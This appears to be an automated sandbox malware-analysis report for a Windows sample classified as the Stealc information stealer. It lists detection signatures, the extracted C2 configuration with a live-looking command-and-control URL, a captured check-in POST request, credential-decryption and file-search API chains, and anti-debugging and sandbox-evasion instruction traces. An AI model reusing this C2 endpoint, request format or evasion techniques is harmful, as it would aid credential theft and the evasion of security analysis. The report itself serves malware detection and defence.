Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543095
MD5: e1d69985ce8b4cb34d5ceca422eb15c3
SHA1: 9382606ea46d759e13140c55d36ec6078c2186b1
SHA256: 0409e35a5fd1f875e55f4f615cb7e31376177a9e2f06e41209576346e9a4d4f7
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E1D69985CE8B4CB34D5CECA422EB15C3)
  • cleanup
Malware family information:
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration:
{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2145893741.0000000004A40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6492 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6492 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.80000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol):
2024-10-27T08:52:06.786046+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6:49710 | 185.215.113.206:80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.80000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0008C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00087240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00087240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00089AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00089AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00089B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00089B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00098EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00098EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_000938B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00094910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00094910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0008DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0008E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0008ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00094570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00094570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0008DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0008BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00093EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00093EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0008F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0008F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_000816D0

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJK | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache
Data Ascii (request body, CRLF line breaks restored from the captured bytes):
------EGCBAFCFIJJJECBGIIJK
Content-Disposition: form-data; name="hwid"

6D039E4546A6894617998
------EGCBAFCFIJJJECBGIIJK
Content-Disposition: form-data; name="build"

puma
------EGCBAFCFIJJJECBGIIJK--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (observed 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00084880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00084880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJK | Host: 185.215.113.206 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache (same request body as above)
Source: file.exe, 00000000.00000002.2191696889.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2191696889.0000000000D64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/R
Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php4Z
Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpLZX
Source: file.exe, 00000000.00000002.2191696889.0000000000D64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/g
Source: file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0033512E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F41B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0042E240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C318
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00443330
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004273C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00457BD8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00449CFB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00453D5E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045957D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045DD14
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003FE546
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003ED698
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038BF62
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00434F2E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0039F792
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00455794
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044B7AE
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 000845C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: cjjmoofv ZLIB complexity 0.9947171138242499
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00099600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00093720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00093720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\X77RWQ8W.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1828352 > 1048576
Source: file.exe | Static PE information: Raw size of cjjmoofv is bigger than: 0x100000 < 0x198400

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cjjmoofv:EW;pwxczyzg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cjjmoofv:EW;pwxczyzg:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00099860 GetProcAddress (x21),LoadLibraryA (x5),GetProcAddress (x7) | 0_2_00099860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cd137 should be: 0x1c05e6
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: cjjmoofv
Source: file.exe | Static PE information: section name: pwxczyzg
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052405F push 6EF231CEh; mov dword ptr [esp], esp | 0_2_005240D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E905F push ebx; mov dword ptr [esp], 69747B5Fh | 0_2_004E908F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E905F push 73DBF815h; mov dword ptr [esp], edx | 0_2_004E9133
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055604D push esi; mov dword ptr [esp], eax | 0_2_00556061
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046905A push 1CDDEEF1h; mov dword ptr [esp], ecx | 0_2_004691CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0046905A push ecx; mov dword ptr [esp], esi | 0_2_00469666
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050204E push 456F5739h; mov dword ptr [esp], eax | 0_2_0050207C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050204E push 42EAC9B2h; mov dword ptr [esp], edi | 0_2_005020BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C587F push 12FBED6Ah; mov dword ptr [esp], eax | 0_2_004C590F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F8878 push 779A3AE9h; mov dword ptr [esp], esp | 0_2_004F889E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0009B035 push ecx; ret | 0_2_0009B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00538033 push 008AFF00h; mov dword ptr [esp], eax | 0_2_0053811E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00538033 push 0CB8F81Ch; mov dword ptr [esp], edi | 0_2_005381C2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F00C6 push 6AC9A5A0h; mov dword ptr [esp], eax | 0_2_004F00F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030509B push 1212F1F1h; mov dword ptr [esp], edx | 0_2_003050E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030509B push 38B8A364h; mov dword ptr [esp], esi | 0_2_00305195
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030509B push edi; mov dword ptr [esp], ebp | 0_2_003051AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push eax; mov dword ptr [esp], ebx | 0_2_004508BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push 08C1F3A9h; mov dword ptr [esp], edi | 0_2_004508C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push 412A32A6h; mov dword ptr [esp], ebp | 0_2_00450918
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push esi; mov dword ptr [esp], 7DD960E7h | 0_2_0045091C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push 64194223h; mov dword ptr [esp], ebx | 0_2_0045093A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push edx; mov dword ptr [esp], eax | 0_2_00450A3B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push esi; mov dword ptr [esp], 11B20598h | 0_2_00450A65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push ecx; mov dword ptr [esp], esi | 0_2_00450A78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push eax; mov dword ptr [esp], esi | 0_2_00450AB3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push 365B3979h; mov dword ptr [esp], ecx | 0_2_00450C1F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push ebp; mov dword ptr [esp], edx | 0_2_00450C4C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push edi; mov dword ptr [esp], 00000001h | 0_2_00450C53
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push 450F5CF0h; mov dword ptr [esp], esi | 0_2_00450C61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00450887 push 4A946D9Ah; mov dword ptr [esp], ecx | 0_2_00450CD2
Source: file.exe | Static PE information: section name: cjjmoofv entropy: 7.953081730798391

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00099860 GetProcAddress (x21),LoadLibraryA (x5),GetProcAddress (x7) | 0_2_00099860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13555
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4628CD second address: 4628F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jp 00007F25ED41A9FCh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F25ED41A9F4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 461C81 second address: 461CD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F25EC6CB8F2h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jns 00007F25EC6CB8E6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 jmp 00007F25EC6CB8F0h 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 jmp 00007F25EC6CB8F3h 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 461CD0 second address: 461CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F25ED41A9E6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 461CDE second address: 461CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 461E64 second address: 461E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F25ED41A9EEh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 461E7D second address: 461EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007F25EC6CB8EAh 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F25EC6CB8ECh 0x00000016 push eax 0x00000017 jbe 00007F25EC6CB8E6h 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 461EA8 second address: 461EC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 461FE8 second address: 46200A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8EFh 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007F25EC6CB8E6h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46200A second address: 46200E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46200E second address: 462047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F25EC6CB8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jne 00007F25EC6CB8FEh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 462047 second address: 462068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46219B second address: 46219F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46219F second address: 4621A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4648ED second address: 46491B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F25EC6CB8F3h 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop ecx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46491B second address: 46491F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 46498C second address: 4649C1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F25EC6CB8E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, 43E90145h 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D1E0Bh] 0x0000001c mov edi, dword ptr [ebp+122D2A39h] 0x00000022 call 00007F25EC6CB8E9h 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a jl 00007F25EC6CB8E6h 0x00000030 pop edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4649C1 second address: 464A06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F25ED41A9ECh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F25ED41A9F7h 0x00000012 jmp 00007F25ED41A9F1h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F25ED41A9F0h 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464AD7 second address: 464ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464ADB second address: 464B02 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F25ED41A9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F25ED41A9E6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007F25ED41A9ECh 0x00000021 rdtsc
